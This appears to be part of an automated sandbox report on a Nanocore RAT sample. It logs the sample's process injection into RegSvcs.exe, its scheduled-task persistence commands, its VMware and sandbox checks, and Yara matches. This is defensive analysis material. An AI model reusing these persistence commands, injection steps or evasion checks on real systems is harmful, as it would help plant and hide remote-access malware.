Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Show sources

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe

Function Chain: threadCreated,threadResumed,handleClosed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2248	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2248	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe TID: 2684	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe TID: 2684	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe TID: 2684	Thread sleep time: -780000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe TID: 2816	Thread sleep time: -36874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe TID: 2668	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2608	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 1848	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2588	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Window / User API: threadDelayed 517

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Code function: 8_2_0076410E sldt word ptr [eax]

8_2_0076410E

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Code function: 8_2_004D11C2 GetSystemInfo,

8_2_004D11C2

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Thread delayed: delay time: 36874	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: plugmangd5693.exe, 00000004.00000002.424681352.000000000029C000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 420000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 422000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 7EFDE008	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\plugmangd5693.exe C:\Users\user\AppData\Roaming\plugmangd5693.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\RWbqWnnjDWI' /XML 'C:\Users\user\AppData\Local\Temp\tmp3709.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3FEE.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2DF5.tmp'	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0	Jump to behavior

Source: RegSvcs.exe, 00000008.00000002.672442525.0000000002889000.00000004.00000001.sdmp	Binary or memory string: Program ManagerH
Source: RegSvcs.exe, 00000008.00000002.672012234.0000000001130000.00000002.00020000.sdmp, taskeng.exe, 0000000C.00000002.671390743.00000000006F0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 00000008.00000002.672012234.0000000001130000.00000002.00020000.sdmp, taskeng.exe, 0000000C.00000002.671390743.00000000006F0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: RegSvcs.exe, 00000008.00000002.671744859.000000000083A000.00000004.00000020.sdmp	Binary or memory string: Program Managerknown.
Source: RegSvcs.exe, 00000008.00000002.672012234.0000000001130000.00000002.00020000.sdmp, taskeng.exe, 0000000C.00000002.671390743.00000000006F0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<
Source: RegSvcs.exe, 00000008.00000002.672442525.0000000002889000.00000004.00000001.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 8.2.RegSvcs.exe.764629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.384dabc.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.760000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.384dabc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.38520e5.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.760000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2996, type: MEMORYSTR

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: plugmangd5693.exe, 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000008.00000002.671546681.00000000005A0000.00000004.00020000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSy